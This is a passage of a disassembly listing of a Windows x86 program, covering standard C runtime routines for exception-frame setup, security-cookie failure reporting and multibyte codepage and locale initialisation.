and [ebp+var_4], 0
mov [ebp+var_C], esp
mov [ebp+var_8], ebp
mov eax, large fs:0
mov [ebp+var_28], eax
lea eax, [ebp+var_28]
mov large fs:0, eax
mov [ebp+var_38], 1
mov eax, [ebp+arg_0]
mov [ebp+var_34], eax
mov eax, [ebp+arg_8]
mov [ebp+var_30], eax
call sub_40539D
mov eax, [eax+80h]
mov [ebp+var_2C], eax
lea eax, [ebp+var_34]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
call [ebp+var_2C]
pop ecx
pop ecx
and [ebp+var_38], 0
loc_40439D: ; DATA XREF: sub_4042F4+10�o
cmp [ebp+var_4], 0
jz short loc_4043BA
mov ebx, large fs:0
mov eax, [ebx]
mov ebx, [ebp+var_28]
mov [ebx], eax
mov large fs:0, ebx
jmp short loc_4043C3
; ---------------------------------------------------------------------------
loc_4043BA: ; CODE XREF: sub_4042F4+AD�j
mov eax, [ebp+var_28]
mov large fs:0, eax
loc_4043C3: ; CODE XREF: sub_4042F4+C4�j
mov eax, [ebp+var_38]
loc_4043C6: ; CODE XREF: sub_4042F4+1D�j
pop ebx
leave
retn
sub_4042F4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4043C9 proc near ; DATA XREF: sub_4042F4+26�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
cld
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
xor ecx, [ebp+arg_4]
call sub_402710
mov eax, [ebp+arg_0]
mov eax, [eax+4]
and eax, 66h
jz short loc_4043F9
mov eax, [ebp+arg_4]
mov dword ptr [eax+24h], 1
xor eax, eax
inc eax
jmp short loc_404463
; ---------------------------------------------------------------------------
jmp short loc_404463
; ---------------------------------------------------------------------------
loc_4043F9: ; CODE XREF: sub_4043C9+1D�j
push 1
mov eax, [ebp+arg_4]
push dword ptr [eax+18h]
mov eax, [ebp+arg_4]
push dword ptr [eax+14h]
mov eax, [ebp+arg_4]
push dword ptr [eax+0Ch]
push 0
push [ebp+arg_8]
mov eax, [ebp+arg_4]
push dword ptr [eax+10h]
push [ebp+arg_0]
call sub_40BD75
add esp, 20h
mov eax, [ebp+arg_4]
cmp dword ptr [eax+24h], 0
jnz short loc_404437
push [ebp+arg_0]
push [ebp+arg_4]
call sub_40423C
loc_404437: ; CODE XREF: sub_4043C9+61�j
push 0
push 0
push 0
push 0
push 0
lea eax, [ebp+var_4]
push eax
push 123h
call sub_4042F4
add esp, 1Ch
mov eax, [ebp+var_4]
mov ebx, [ebp+arg_4]
mov esp, [ebx+1Ch]
mov ebp, [ebx+20h]
jmp eax
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
loc_404463: ; CODE XREF: sub_4043C9+2C�j
; sub_4043C9+2E�j
pop ebx
leave
retn
sub_4043C9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404466 proc near ; CODE XREF: sub_40B915+81�p
; sub_40BA07+1C6�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov eax, [edi+10h]
mov esi, [edi+0Ch]
mov [ebp+var_4], eax
mov ebx, esi
jmp short loc_4044AA
; ---------------------------------------------------------------------------
loc_40447D: ; CODE XREF: sub_404466+4B�j
cmp esi, 0FFFFFFFFh
jnz short loc_404487
call sub_40BEA5
loc_404487: ; CODE XREF: sub_404466+1A�j
mov ecx, [ebp+var_4]
dec esi
mov eax, esi
imul eax, 14h
add eax, ecx
mov ecx, [ebp+arg_8]
cmp [eax+4], ecx
jge short loc_40449F
cmp ecx, [eax+8]
jle short loc_4044A4
loc_40449F: ; CODE XREF: sub_404466+32�j
cmp esi, 0FFFFFFFFh
jnz short loc_4044AD
loc_4044A4: ; CODE XREF: sub_404466+37�j
dec [ebp+arg_4]
mov ebx, [ebp+arg_0]
loc_4044AA: ; CODE XREF: sub_404466+15�j
mov [ebp+arg_0], esi
loc_4044AD: ; CODE XREF: sub_404466+3C�j
cmp [ebp+arg_4], 0
jge short loc_40447D
mov eax, [ebp+arg_C]
inc esi
mov [eax], esi
mov eax, [ebp+arg_10]
mov [eax], ebx
cmp ebx, [edi+0Ch]
ja short loc_4044C7
cmp esi, ebx
jbe short loc_4044CC
loc_4044C7: ; CODE XREF: sub_404466+5B�j
call sub_40BEA5
loc_4044CC: ; CODE XREF: sub_404466+5F�j
mov eax, esi
imul eax, 14h
add eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_404466 endp
; =============== S U B R O U T I N E =======================================
sub_4044D9 proc near ; CODE XREF: sub_40B4FD+28�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
mov [esi], eax
call sub_40539D
mov eax, [eax+98h]
mov [esi+4], eax
call sub_40539D
mov [eax+98h], esi
mov eax, esi
pop esi
retn
sub_4044D9 endp
; =============== S U B R O U T I N E =======================================
sub_404501 proc near ; CODE XREF: sub_40B623+60�p
arg_0 = dword ptr 4
call sub_40539D
mov eax, [eax+98h]
jmp short loc_404519
; ---------------------------------------------------------------------------
loc_40450E: ; CODE XREF: sub_404501+1A�j
mov ecx, [eax]
cmp ecx, [esp+arg_0]
jz short loc_40451F
mov eax, [eax+4]
loc_404519: ; CODE XREF: sub_404501+B�j
test eax, eax
jnz short loc_40450E
inc eax
retn
; ---------------------------------------------------------------------------
loc_40451F: ; CODE XREF: sub_404501+13�j
xor eax, eax
retn
sub_404501 endp
; =============== S U B R O U T I N E =======================================
sub_404522 proc near ; CODE XREF: sub_40B623+9�p
arg_0 = dword ptr 4
push esi
call sub_40539D
mov esi, [esp+4+arg_0]
cmp esi, [eax+98h]
jnz short loc_404544
call sub_40539D
mov ecx, [esi+4]
mov [eax+98h], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_404544: ; CODE XREF: sub_404522+10�j
call sub_40539D
mov eax, [eax+98h]
jmp short loc_40455A
; ---------------------------------------------------------------------------
loc_404551: ; CODE XREF: sub_404522+3C�j
mov ecx, [eax+4]
cmp esi, ecx
jz short loc_404566
mov eax, ecx
loc_40455A: ; CODE XREF: sub_404522+2D�j
cmp dword ptr [eax+4], 0
jnz short loc_404551
pop esi
jmp sub_40BEA5
; ---------------------------------------------------------------------------
loc_404566: ; CODE XREF: sub_404522+34�j
mov ecx, [esi+4]
mov [eax+4], ecx
pop esi
retn
sub_404522 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40456E proc near ; CODE XREF: sub_40B4FD+7F�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, ds:dword_423064
and [ebp+var_18], 0
lea ecx, [ebp+var_18]
xor eax, ecx
mov ecx, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_4]
mov [ebp+var_C], eax
mov eax, [ebp+arg_C]
inc eax
mov [ebp+var_14], offset loc_4042C4
mov [ebp+var_8], ecx
mov [ebp+var_4], eax
mov eax, large fs:0
mov [ebp+var_18], eax
lea eax, [ebp+var_18]
mov large fs:0, eax
push [ebp+arg_10]
push ecx
push [ebp+arg_8]
call sub_40BEF0
mov ecx, eax
mov eax, [ebp+var_18]
mov large fs:0, eax
mov eax, ecx
leave
retn
sub_40456E endp
; =============== S U B R O U T I N E =======================================
sub_4045CC proc near ; CODE XREF: sub_401065+7�p
; sub_40121E+7�p ...
arg_0 = byte ptr 4
push eax
push large dword ptr fs:0
lea eax, [esp+8+arg_0]
sub esp, [esp+0Ch]
push ebx
push esi
push edi
mov [eax], ebp
mov ebp, eax
mov eax, ds:dword_423064
xor eax, ebp
push eax
push dword ptr [ebp-4]
mov dword ptr [ebp-4], 0FFFFFFFFh
lea eax, [ebp-0Ch]
mov large fs:0, eax
retn
sub_4045CC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4045FF proc near ; CODE XREF: sub_401442+7�p
; sub_40B4B4+7�p
arg_0 = byte ptr 4
push eax
push large dword ptr fs:0
lea eax, [esp+8+arg_0]
sub esp, [esp+0Ch]
push ebx
push esi
push edi
mov [eax], ebp
mov ebp, eax
mov eax, ds:dword_423064
xor eax, ebp
push eax
mov [ebp-10h], esp
push dword ptr [ebp-4]
mov dword ptr [ebp-4], 0FFFFFFFFh
lea eax, [ebp-0Ch]
mov large fs:0, eax
retn
sub_4045FF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404635 proc near ; CODE XREF: sub_40177B+A�p
; sub_4019F3+A�p ...
arg_0 = byte ptr 4
push eax
push large dword ptr fs:0
lea eax, [esp+8+arg_0]
sub esp, [esp+0Ch]
push ebx
push esi
push edi
mov [eax], ebp
mov ebp, eax
mov eax, ds:dword_423064
xor eax, ebp
push eax
mov [ebp-10h], eax
push dword ptr [ebp-4]
mov dword ptr [ebp-4], 0FFFFFFFFh
lea eax, [ebp-0Ch]
mov large fs:0, eax
retn
sub_404635 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40466B proc near ; CODE XREF: sub_401065+2D�p
; sub_40121E+6B�p ...
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
retn
sub_40466B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40467F proc near ; CODE XREF: sub_40177B:loc_4019EB�p
; sub_4019F3:loc_401C15�p ...
mov ecx, [ebp-10h]
xor ecx, ebp
call sub_402710
jmp sub_40466B
sub_40467F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40468E proc near ; CODE XREF: sub_402710:loc_40271A�j
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_320 = dword ptr -320h
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 328h
mov ds:dword_425BA8, eax
mov ds:dword_425BA4, ecx
mov ds:dword_425BA0, edx
mov ds:dword_425B9C, ebx
mov ds:dword_425B98, esi
mov ds:dword_425B94, edi
mov ds:word_425BC0, ss
mov ds:word_425BB4, cs
mov ds:word_425B90, ds
mov ds:word_425B8C, es
mov ds:word_425B88, fs
mov ds:word_425B84, gs
pushf
pop ds:dword_425BB8
mov eax, [ebp+0]
mov ds:dword_425BAC, eax
mov eax, [ebp+4]
mov ds:dword_425BB0, eax
lea eax, [ebp+arg_0]
mov ds:dword_425BBC, eax
mov eax, [ebp+var_320]
mov ds:dword_425AF8, 10001h
mov eax, ds:dword_425BB0
mov ds:dword_425AAC, eax
mov ds:dword_425AA0, 0C0000409h
mov ds:dword_425AA4, 1
mov eax, ds:dword_423064
mov [ebp+var_328], eax
mov eax, ds:dword_423068
mov [ebp+var_324], eax
call ds:dword_41D090
mov ds:dword_425AF0, eax
push 1
call sub_407B65
pop ecx
push 0
call ds:dword_41D19C
push offset off_41D3F8
call ds:dword_41D198 ; UnhandledExceptionFilter
cmp ds:dword_425AF0, 0
jnz short loc_40477E
push 1
call sub_407B65
pop ecx
loc_40477E: ; CODE XREF: sub_40468E+E6�j
push 0C0000409h
call ds:dword_41D0CC
push eax
call ds:dword_41D0F8
leave
retn
sub_40468E endp
; =============== S U B R O U T I N E =======================================
sub_404792 proc near ; CODE XREF: sub_404ABE+11E�p
; sub_404ABE+173�p
sub eax, 3A4h
jz short loc_4047BB
sub eax, 4
jz short loc_4047B5
sub eax, 0Dh
jz short loc_4047AF
dec eax
jz short loc_4047A9
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4047A9: ; CODE XREF: sub_404792+12�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_4047AF: ; CODE XREF: sub_404792+F�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_4047B5: ; CODE XREF: sub_404792+A�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_4047BB: ; CODE XREF: sub_404792+5�j
mov eax, 411h
retn
sub_404792 endp
; =============== S U B R O U T I N E =======================================
sub_4047C1 proc near ; CODE XREF: sub_404ABE+2B�p
push ebx
push ebp
push esi
push edi
mov ebp, 101h
mov esi, eax
push ebp
xor edi, edi
lea ebx, [esi+1Ch]
push edi
push ebx
call sub_407B70
mov [esi+4], edi
mov [esi+8], edi
mov [esi+0Ch], edi
xor eax, eax
lea edi, [esi+10h]
stosd
stosd
stosd
mov eax, offset dword_423070
add esp, 0Ch
sub eax, esi
loc_4047F4: ; CODE XREF: sub_4047C1+3A�j
mov cl, [eax+ebx]
mov [ebx], cl
inc ebx
dec ebp
jnz short loc_4047F4
lea ecx, [esi+11Dh]
mov esi, 100h
loc_404808: ; CODE XREF: sub_4047C1+4E�j
mov dl, [ecx+eax]
mov [ecx], dl
inc ecx
dec esi
jnz short loc_404808
pop edi
pop esi
pop ebp
pop ebx
retn
sub_4047C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=49Ch
sub_404816 proc near ; CODE XREF: sub_404ABE+141�p
var_51C = dword ptr -51Ch
var_518 = byte ptr -518h
var_512 = byte ptr -512h
var_511 = byte ptr -511h
var_504 = word ptr -504h
var_304 = byte ptr -304h
var_204 = byte ptr -204h
var_104 = byte ptr -104h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-49Ch]
sub esp, 51Ch
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+49Ch+var_4], eax
push ebx
push edi
lea eax, [ebp+49Ch+var_518]
push eax
push dword ptr [esi+4]
call ds:dword_41D1B4
test eax, eax
mov edi, 100h
jz loc_40493C
xor eax, eax
loc_40484F: ; CODE XREF: sub_404816+43�j
mov [ebp+eax+49Ch+var_104], al
inc eax
cmp eax, edi
jb short loc_40484F
mov al, [ebp+49Ch+var_512]
test al, al
mov [ebp+49Ch+var_104], 20h
jz short loc_404894
lea ebx, [ebp+49Ch+var_511]
loc_40486C: ; CODE XREF: sub_404816+7C�j
movzx ecx, al
movzx eax, byte ptr [ebx]
cmp ecx, eax
ja short loc_40488C
sub eax, ecx
inc eax
push eax
lea edx, [ebp+ecx+49Ch+var_104]
push 20h
push edx
call sub_407B70
add esp, 0Ch
loc_40488C: ; CODE XREF: sub_404816+5E�j
inc ebx
mov al, [ebx]
inc ebx
test al, al
jnz short loc_40486C
loc_404894: ; CODE XREF: sub_404816+51�j
push 0
push dword ptr [esi+0Ch]
lea eax, [ebp+49Ch+var_504]
push dword ptr [esi+4]
push eax
push edi
lea eax, [ebp+49Ch+var_104]
push eax
push 1
push 0
call sub_40C4F4
xor ebx, ebx
push ebx
push dword ptr [esi+4]
lea eax, [ebp+49Ch+var_204]
push edi
push eax
push edi
lea eax, [ebp+49Ch+var_104]
push eax
push edi
push dword ptr [esi+0Ch]
push ebx
call sub_40C2F9
add esp, 44h
push ebx
push dword ptr [esi+4]
lea eax, [ebp+49Ch+var_304]
push edi
push eax
push edi
lea eax, [ebp+49Ch+var_104]
push eax
push 200h
push dword ptr [esi+0Ch]
push ebx
call sub_40C2F9
add esp, 24h
xor eax, eax
loc_4048FB: ; CODE XREF: sub_404816+122�j
movzx ecx, [ebp+eax*2+49Ch+var_504]
test cl, 1
jz short loc_404913
or byte ptr [esi+eax+1Dh], 10h
mov cl, [ebp+eax+49Ch+var_204]
jmp short loc_404924
; ---------------------------------------------------------------------------
loc_404913: ; CODE XREF: sub_404816+ED�j
test cl, 2
jz short loc_40492D
or byte ptr [esi+eax+1Dh], 20h
mov cl, [ebp+eax+49Ch+var_304]
loc_404924: ; CODE XREF: sub_404816+FB�j
mov [esi+eax+11Dh], cl
jmp short loc_404935
; ---------------------------------------------------------------------------
loc_40492D: ; CODE XREF: sub_404816+100�j
mov byte ptr [esi+eax+11Dh], 0
loc_404935: ; CODE XREF: sub_404816+115�j
inc eax
cmp eax, edi
jb short loc_4048FB
jmp short loc_404989
; ---------------------------------------------------------------------------
loc_40493C: ; CODE XREF: sub_404816+31�j
lea eax, [esi+11Dh]
mov [ebp+49Ch+var_51C], 0FFFFFF9Fh
xor ecx, ecx
sub [ebp+49Ch+var_51C], eax
loc_40494E: ; CODE XREF: sub_404816+171�j
mov edx, [ebp+49Ch+var_51C]
lea eax, [esi+ecx+11Dh]
add edx, eax
lea ebx, [edx+20h]
cmp ebx, 19h
ja short loc_40496E
or byte ptr [esi+ecx+1Dh], 10h
mov dl, cl
add dl, 20h
jmp short loc_40497D
; ---------------------------------------------------------------------------
loc_40496E: ; CODE XREF: sub_404816+14A�j
cmp edx, 19h
ja short loc_404981
or byte ptr [esi+ecx+1Dh], 20h
mov dl, cl
sub dl, 20h
loc_40497D: ; CODE XREF: sub_404816+156�j
mov [eax], dl
jmp short loc_404984
; ---------------------------------------------------------------------------
loc_404981: ; CODE XREF: sub_404816+15B�j
mov byte ptr [eax], 0
loc_404984: ; CODE XREF: sub_404816+169�j
inc ecx
cmp ecx, edi
jb short loc_40494E
loc_404989: ; CODE XREF: sub_404816+124�j
mov ecx, [ebp+49Ch+var_4]
pop edi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 49Ch
leave
retn
sub_404816 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4049A0 proc near ; CODE XREF: sub_40271F+57�p
; sub_404C69+1A�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset dword_421430
call __SEH_prolog4
call sub_40539D
mov edi, eax
mov eax, ds:dword_423594
test [edi+70h], eax
jz short loc_4049DA
cmp dword ptr [edi+6Ch], 0
jz short loc_4049DA
mov esi, [edi+68h]
loc_4049C6: ; CODE XREF: sub_4049A0+96�j
test esi, esi
jnz short loc_4049D2
push 20h
call sub_40785D
pop ecx
loc_4049D2: ; CODE XREF: sub_4049A0+28�j
mov eax, esi
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_4049DA: ; CODE XREF: sub_4049A0+1B�j
; sub_4049A0+21�j
push 0Dh
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
mov esi, [edi+68h]
mov [ebp+var_1C], esi
cmp esi, ds:off_423498
jz short loc_404A2A
test esi, esi
jz short loc_404A12
push esi
call ds:dword_41D1BC
test eax, eax
jnz short loc_404A12
cmp esi, offset dword_423070
jz short loc_404A12
push esi
call sub_403603
pop ecx
loc_404A12: ; CODE XREF: sub_4049A0+56�j
; sub_4049A0+61�j ...
mov eax, ds:off_423498
mov [edi+68h], eax
mov esi, ds:off_423498
mov [ebp+var_1C], esi
push esi
call ds:dword_41D1B8
loc_404A2A: ; CODE XREF: sub_4049A0+52�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_404A3B
jmp short loc_4049C6
sub_4049A0 endp
; =============== S U B R O U T I N E =======================================
sub_404A38 proc near ; DATA XREF: J8@F_7_S:00421448�o
mov esi, [ebp-1Ch]
sub_404A38 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404A3B proc near ; CODE XREF: sub_4049A0+91�p
push 0Dh
call sub_40591F
pop ecx
retn
sub_404A3B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404A44 proc near ; CODE XREF: sub_404ABE+19�p
; sub_404C69+25�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ebx, ebx
push ebx
lea ecx, [ebp+var_10]
call sub_40271F
cmp esi, 0FFFFFFFEh
mov ds:dword_425DC4, ebx
jnz short loc_404A7F
mov ds:dword_425DC4, 1
call ds:dword_41D188
loc_404A71: ; CODE XREF: sub_404A44+50�j
; sub_404A44+67�j
cmp [ebp+var_4], bl
jz short loc_404ABB
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp short loc_404ABB
; ---------------------------------------------------------------------------
loc_404A7F: ; CODE XREF: sub_404A44+1B�j
cmp esi, 0FFFFFFFDh
jnz short loc_404A96
mov ds:dword_425DC4, 1
call ds:dword_41D18C
jmp short loc_404A71
; ---------------------------------------------------------------------------
loc_404A96: ; CODE XREF: sub_404A44+3E�j
cmp esi, 0FFFFFFFCh
jnz short loc_404AAD
mov eax, [ebp+var_10]
mov eax, [eax+4]
mov ds:dword_425DC4, 1
jmp short loc_404A71
; ---------------------------------------------------------------------------
loc_404AAD: ; CODE XREF: sub_404A44+55�j
cmp [ebp+var_4], bl
jz short loc_404AB9
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_404AB9: ; CODE XREF: sub_404A44+6C�j
mov eax, esi
loc_404ABB: ; CODE XREF: sub_404A44+30�j
; sub_404A44+39�j
pop ebx
leave
retn
sub_404A44 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404ABE proc near ; CODE XREF: sub_404C69+5E�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
push edi
call sub_404A44
mov edi, eax
xor esi, esi
cmp edi, esi
mov [ebp+arg_0], edi
jnz short loc_404AF5
loc_404AE7: ; CODE XREF: sub_404ABE+193�j
mov eax, ebx
call sub_4047C1
loc_404AEE: ; CODE XREF: sub_404ABE+146�j
xor eax, eax
jmp loc_404C5A
; ---------------------------------------------------------------------------
loc_404AF5: ; CODE XREF: sub_404ABE+27�j
mov [ebp+var_1C], esi
xor eax, eax
loc_404AFA: ; CODE XREF: sub_404ABE+4F�j
cmp ds:dword_4234A0[eax], edi
jz short loc_404B69
inc [ebp+var_1C]
add eax, 30h
cmp eax, 0F0h
jb short loc_404AFA
lea eax, [ebp+var_18]
push eax
push edi
call ds:dword_41D1B4
test eax, eax
jz loc_404C4B
push 101h
lea eax, [ebx+1Ch]
push esi
push eax
call sub_407B70
xor edx, edx
inc edx
add esp, 0Ch
cmp [ebp+var_18], edx
mov [ebx+4], edi
mov [ebx+0Ch], esi
jbe loc_404C3E
cmp [ebp+var_12], 0
jz loc_404C1F
lea esi, [ebp+var_11]
loc_404B53: ; CODE XREF: sub_404ABE+15B�j
mov cl, [esi]
test cl, cl
jz loc_404C1F
movzx eax, byte ptr [esi-1]
movzx ecx, cl
jmp loc_404C0F
; ---------------------------------------------------------------------------
loc_404B69: ; CODE XREF: sub_404ABE+42�j
push 101h
lea eax, [ebx+1Ch]
push esi
push eax
call sub_407B70
mov ecx, [ebp+var_1C]
add esp, 0Ch
imul ecx, 30h
mov [ebp+var_20], esi
lea esi, dword_4234B0[ecx]
mov [ebp+var_1C], esi
jmp short loc_404BB9
; ---------------------------------------------------------------------------
loc_404B8F: ; CODE XREF: sub_404ABE+FE�j
mov al, [esi+1]
test al, al
jz short loc_404BBE
movzx edi, byte ptr [esi]
movzx eax, al
jmp short loc_404BB0
; ---------------------------------------------------------------------------
loc_404B9E: ; CODE XREF: sub_404ABE+F4�j
mov eax, [ebp+var_20]
mov al, ds:byte_42349C[eax]
or [ebx+edi+1Dh], al
movzx eax, byte ptr [esi+1]
inc edi
loc_404BB0: ; CODE XREF: sub_404ABE+DE�j
cmp edi, eax
jbe short loc_404B9E
mov edi, [ebp+arg_0]
inc esi
inc esi
loc_404BB9: ; CODE XREF: sub_404ABE+CF�j
; sub_404ABE+110�j
cmp byte ptr [esi], 0
jnz short loc_404B8F
loc_404BBE: ; CODE XREF: sub_404ABE+D6�j
mov esi, [ebp+var_1C]
inc [ebp+var_20]
add esi, 8
cmp [ebp+var_20], 4
mov [ebp+var_1C], esi
jb short loc_404BB9
mov eax, edi
mov [ebx+4], edi
mov dword ptr [ebx+8], 1
call sub_404792
push 6
mov [ebx+0Ch], eax
lea eax, [ebx+10h]
lea ecx, dword_4234A4[ecx]
pop edx
loc_404BF0: ; CODE XREF: sub_404ABE+13D�j
mov si, [ecx]
inc ecx
mov [eax], si
inc ecx
inc eax
inc eax
dec edx
jnz short loc_404BF0
loc_404BFD: ; CODE XREF: sub_404ABE+18B�j
mov esi, ebx
call sub_404816
jmp loc_404AEE
; ---------------------------------------------------------------------------
loc_404C09: ; CODE XREF: sub_404ABE+153�j
or byte ptr [ebx+eax+1Dh], 4
inc eax
loc_404C0F: ; CODE XREF: sub_404ABE+A6�j
cmp eax, ecx
jbe short loc_404C09
inc esi
inc esi
cmp byte ptr [esi-1], 0
jnz loc_404B53
loc_404C1F: ; CODE XREF: sub_404ABE+8C�j
; sub_404ABE+99�j
lea eax, [ebx+1Eh]
mov ecx, 0FEh
loc_404C27: ; CODE XREF: sub_404ABE+16E�j
or byte ptr [eax], 8
inc eax
dec ecx
jnz short loc_404C27
mov eax, [ebx+4]
call sub_404792
mov [ebx+0Ch], eax
mov [ebx+8], edx
jmp short loc_404C41
; ---------------------------------------------------------------------------
loc_404C3E: ; CODE XREF: sub_404ABE+82�j
mov [ebx+8], esi
loc_404C41: ; CODE XREF: sub_404ABE+17E�j
xor eax, eax
lea edi, [ebx+10h]
stosd
stosd
stosd
jmp short loc_404BFD
; ---------------------------------------------------------------------------
loc_404C4B: ; CODE XREF: sub_404ABE+5E�j
cmp ds:dword_425DC4, esi
jnz loc_404AE7
or eax, 0FFFFFFFFh
loc_404C5A: ; CODE XREF: sub_404ABE+32�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_404ABE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404C69 proc near ; CODE XREF: sub_404E03+B�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00404DD5 SIZE 0000002E BYTES
push 14h
push offset dword_421450
call __SEH_prolog4
or [ebp+var_20], 0FFFFFFFFh
call sub_40539D
mov edi, eax
mov [ebp+var_24], edi
call sub_4049A0
mov ebx, [edi+68h]
mov esi, [ebp+arg_0]
call sub_404A44
mov [ebp+arg_0], eax
cmp eax, [ebx+4]
jz loc_404DF6
push 220h
call sub_40773A
pop ecx
mov ebx, eax
test ebx, ebx
jz loc_404DFA
mov ecx, 88h
mov esi, [edi+68h]
mov edi, ebx
rep movsd
and dword ptr [ebx], 0
push ebx
push [ebp+arg_0]
call sub_404ABE
pop ecx
pop ecx
mov [ebp+var_20], eax
test eax, eax
jnz loc_404DD5
mov esi, [ebp+var_24]
push dword ptr [esi+68h]
call ds:dword_41D1BC
test eax, eax
jnz short loc_404CFA
mov eax, [esi+68h]
cmp eax, offset dword_423070
jz short loc_404CFA
push eax
call sub_403603
pop ecx
loc_404CFA: ; CODE XREF: sub_404C69+7E�j
; sub_404C69+88�j
mov [esi+68h], ebx
push ebx
mov edi, ds:dword_41D1B8
call edi
test byte ptr [esi+70h], 2
jnz loc_404DFA
test byte ptr ds:dword_423594, 1
jnz loc_404DFA
push 0Dh
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [ebx+4]
mov ds:dword_425DD4, eax
mov eax, [ebx+8]
mov ds:dword_425DD8, eax
mov eax, [ebx+0Ch]
mov ds:dword_425DDC, eax
xor eax, eax
loc_404D43: ; CODE XREF: sub_404C69+F0�j
mov [ebp+var_1C], eax
cmp eax, 5
jge short loc_404D5B
mov cx, [ebx+eax*2+10h]
mov ds:word_425DC8[eax*2], cx
inc eax
jmp short loc_404D43
; ---------------------------------------------------------------------------
loc_404D5B: ; CODE XREF: sub_404C69+E0�j
xor eax, eax
loc_404D5D: ; CODE XREF: sub_404C69+109�j
mov [ebp+var_1C], eax
cmp eax, 101h
jge short loc_404D74
mov cl, [eax+ebx+1Ch]
mov ds:byte_423290[eax], cl
inc eax
jmp short loc_404D5D
; ---------------------------------------------------------------------------
loc_404D74: ; CODE XREF: sub_404C69+FC�j
xor eax, eax
loc_404D76: ; CODE XREF: sub_404C69+125�j
mov [ebp+var_1C], eax
cmp eax, 100h
jge short loc_404D90
mov cl, [eax+ebx+11Dh]
mov ds:byte_423398[eax], cl
inc eax
jmp short loc_404D76
; ---------------------------------------------------------------------------
loc_404D90: ; CODE XREF: sub_404C69+115�j
push ds:off_423498
call ds:dword_41D1BC
test eax, eax
jnz short loc_404DB3
mov eax, ds:off_423498
cmp eax, offset dword_423070
jz short loc_404DB3
push eax
call sub_403603
pop ecx
loc_404DB3: ; CODE XREF: sub_404C69+135�j
; sub_404C69+141�j
mov ds:off_423498, ebx
push ebx
call edi
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_404DCA
jmp short loc_404DFA
sub_404C69 endp
; =============== S U B R O U T I N E =======================================
sub_404DCA proc near ; CODE XREF: sub_404C69+15A�p
; DATA XREF: J8@F_7_S:00421468�o
push 0Dh
call sub_40591F
pop ecx
retn
sub_404DCA endp
; ---------------------------------------------------------------------------
jmp short loc_404DFA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_404C69
loc_404DD5: ; CODE XREF: sub_404C69+6A�j
cmp eax, 0FFFFFFFFh
jnz short loc_404DFA
